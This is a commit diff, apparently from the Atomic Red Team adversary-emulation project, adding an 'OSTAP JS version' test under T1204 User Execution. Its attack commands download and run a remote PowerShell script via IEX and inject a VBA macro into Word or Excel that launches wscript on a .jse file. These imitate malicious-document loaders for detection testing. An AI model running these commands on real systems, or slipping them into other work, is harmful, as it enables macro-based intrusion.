Generate docs from job=validate_atomics_generate_docs branch=master

atomics/T1204/T1204.md

@@ -12,6 +12,8 @@ While User Execution frequently occurs shortly after Initial Access it may occur
 
 - [Atomic Test #2 - Maldoc choice flags command execution](#atomic-test-2---maldoc-choice-flags-command-execution)
 
+- [Atomic Test #3 - OSTAP JS version](#atomic-test-3---ostap-js-version)
+
 
 <br/>
 
@@ -45,12 +47,12 @@ Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
 #### Cleanup Commands:
 ```
 if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-try { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' } catch {}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
 ```
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: Test Requires MS Word to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
 ##### Check Prereq Commands:
 ```
 If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
@@ -90,12 +92,59 @@ Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
 
 #### Cleanup Commands:
 ```
-try { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' } catch {}
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
 ```
 
 
 #### Dependencies:  Run with `powershell`!
-##### Description: Test Requires MS Word or Excel to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Check Prereq Commands:
+```
+If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 
+```
+##### Get Prereq Commands:
+```
+$msword = New-Object -ComObject word.application
+Stop-Process -Name WINWORD
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - OSTAP JS version
+Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript 
+Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
+| ms_product | Maldoc application Word or Excel | String | Word|
+| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
+
+
+#### Attack Commands: Run with `powershell`! 
+```
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
+Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+```
+
+#### Cleanup Commands:
+```
+if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+```
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
 ##### Check Prereq Commands:
 ```
 If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 } 

atomics/index.md

@@ -804,6 +804,7 @@
 - [T1204 User Execution](./T1204/T1204.md)
   - Atomic Test #1: OSTap Style Macro Execution [windows]
   - Atomic Test #2: Maldoc choice flags command execution [windows]
+  - Atomic Test #3: OSTAP JS version [windows]
 - [T1047 Windows Management Instrumentation](./T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]

atomics/index.yaml

@@ -23785,7 +23785,7 @@ execution:
           default: C:\Users\Public\art.jse
       dependency_executor_name: powershell
       dependencies:
-      - description: Test Requires MS Word to be installed and have been run previously.
+      - description: Test Requires MS Office to be installed and have been run previously.
           Run -GetPrereqs to run msword and build dependant registry keys
         prereq_command: If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
           { exit 0 } else { exit 1 }
@@ -23801,7 +23801,7 @@ execution:
           Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
         cleanup_command: |
           if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-          try { Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' } catch {}
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
     - name: Maldoc choice flags command execution
       description: |
         This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
@@ -23819,9 +23819,8 @@ execution:
           default: Word
       dependency_executor_name: powershell
       dependencies:
-      - description: Test Requires MS Word or Excel to be installed and have been
-          run previously. Run -GetPrereqs to run msword and build dependant registry
-          keys
+      - description: Test Requires MS Office to be installed and have been run previously.
+          Run -GetPrereqs to run msword and build dependant registry keys
         prereq_command: If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
           { exit 0 } else { exit 1 }
         get_prereq_command: |-
@@ -23834,10 +23833,48 @@ execution:
           IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
           $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
           Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
-        cleanup_command: 'try { Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
-          -Name ''AccessVBOM'' } catch {}
+        cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
+          -Name ''AccessVBOM'' -ErrorAction Ignore
 
 '
+    - name: OSTAP JS version
+      description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
+        \nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
+        to load and execute VBA code into Excel or Word documents.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        ms_office_version:
+          description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
+          type: String
+          default: '16.0'
+        ms_product:
+          description: Maldoc application Word or Excel
+          type: String
+          default: Word
+        jse_path:
+          description: jse file to execute with wscript
+          type: Path
+          default: C:\Users\Public\art.jse
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Test Requires MS Office to be installed and have been run previously.
+          Run -GetPrereqs to run msword and build dependant registry keys
+        prereq_command: If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
+          { exit 0 } else { exit 1 }
+        get_prereq_command: |-
+          $msword = New-Object -ComObject word.application
+          Stop-Process -Name WINWORD
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
+          Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+        cleanup_command: |
+          if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
+          Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
   T1047:
     technique:
       x_mitre_permissions_required:

atomics/windows-index.md

@@ -674,6 +674,7 @@
 - [T1204 User Execution](./T1204/T1204.md)
   - Atomic Test #1: OSTap Style Macro Execution [windows]
   - Atomic Test #2: Maldoc choice flags command execution [windows]
+  - Atomic Test #3: OSTAP JS version [windows]
 - [T1047 Windows Management Instrumentation](./T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]